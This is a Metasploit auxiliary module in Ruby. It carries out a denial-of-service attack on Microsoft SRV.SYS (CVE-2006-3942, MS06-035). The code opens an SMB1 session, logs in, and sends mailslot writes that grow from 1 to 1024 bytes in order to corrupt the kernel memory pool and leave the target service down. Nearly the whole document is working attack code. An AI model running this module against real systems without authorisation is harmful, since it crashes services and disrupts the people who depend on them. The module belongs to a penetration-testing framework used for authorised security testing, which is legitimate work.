##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Dos

  # Largest payload length tried in a single run; one mailslot write is sent
  # for every length from 1 byte up to and including this value.
  MAX_WRITE_LENGTH = 1024

  # A progress line is printed every this many iterations.
  PROGRESS_INTERVAL = 100

  # Registers the module metadata and the MAILSLOT option. The SMB protocol
  # version option is removed because the connection made in `run` is pinned
  # to SMB1 (`connect(versions: [1])`), so the setting would have no effect.
  #
  # @param info [Hash] metadata merged by the framework via `update_info`
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft SRV.SYS Mailslot Write Corruption',
        'Description' => %q{
          This module triggers a kernel pool corruption bug in SRV.SYS. Each
          call to the mailslot write function results in a two byte return value
          being written into the response packet. The code which creates this packet
          fails to consider these two bytes in the allocation routine, resulting in
          a slow corruption of the kernel memory pool. These two bytes are almost
          always set to "\xff\xff" (a short integer with value of -1).
        },
        'Author' => ['hdm'],
        'License' => MSF_LICENSE,
        'References' => [
          ['BID', '19215'],
          ['OSVDB', '27644'],
          ['CVE', '2006-3942'],
          ['URL', 'http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10'],
          ['MSB', 'MS06-035']
        ],
        'Actions' => [
          ['Attack', { 'Description' => 'Run Denial of Service' }]
        ],
        'DefaultAction' => 'Attack',
        'DisclosureDate' => '2006-07-11',
        # The target service is expected to stay down after a successful run.
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options([
      OptString.new('MAILSLOT', [true, 'The mailslot name to use', 'Alerter'])
    ])

    deregister_options('SMB::ProtocolVersion')
  end

  # MAILSLOT: HydraLsServer
  # MAILSLOT: Messngr
  # MAILSLOT: 53cb31a0\\UnimodemNotifyTSP

  # Module entry point. Only the 'Attack' action does any work; the SMB
  # session is closed afterwards regardless of which action was selected.
  def run
    attack if action.name == 'Attack'
    disconnect
  end

  private

  # Full mailslot path built from the MAILSLOT option.
  #
  # @return [String] path of the form `\MAILSLOT\<name>`
  def mailslot_path
    '\\MAILSLOT\\' + datastore['MAILSLOT']
  end

  # Opens an SMB1 session, authenticates, then sends one mailslot write per
  # payload length from 1 to MAX_WRITE_LENGTH. The loop stops at the first
  # failed write or on a user interrupt; errors are reported, not re-raised.
  def attack
    print_status('Mangling the kernel, two bytes at a time...')

    connect(versions: [1])
    smb_login

    1.upto(MAX_WRITE_LENGTH) do |length|
      print_status("Sending request containing #{length} bytes...") if (length % PROGRESS_INTERVAL).zero?

      begin
        simple.client.trans_mailslot(mailslot_path, 'X' * length)
      rescue ::Interrupt
        break
      rescue StandardError => e
        report_write_failure(length, e)
        break
      end
    end

    # Errors:
    # 0xc0000034 = object not found
    # 0xc0000205 = insufficient resources (too much data)
  end

  # Prints why the write loop stopped. A failure on the very first write
  # means nothing reached the mailslot at all and is reported differently.
  #
  # @param length [Integer] payload length of the write that failed
  # @param error [StandardError] the exception raised by the write
  def report_write_failure(length, error)
    if length == 1
      print_error("Failed to write any data to the mailslot: #{error}")
    else
      print_error("Exception occurred on iteration #{length}")
      print_error("Error: #{error.class} > #{error}")
    end
  end
end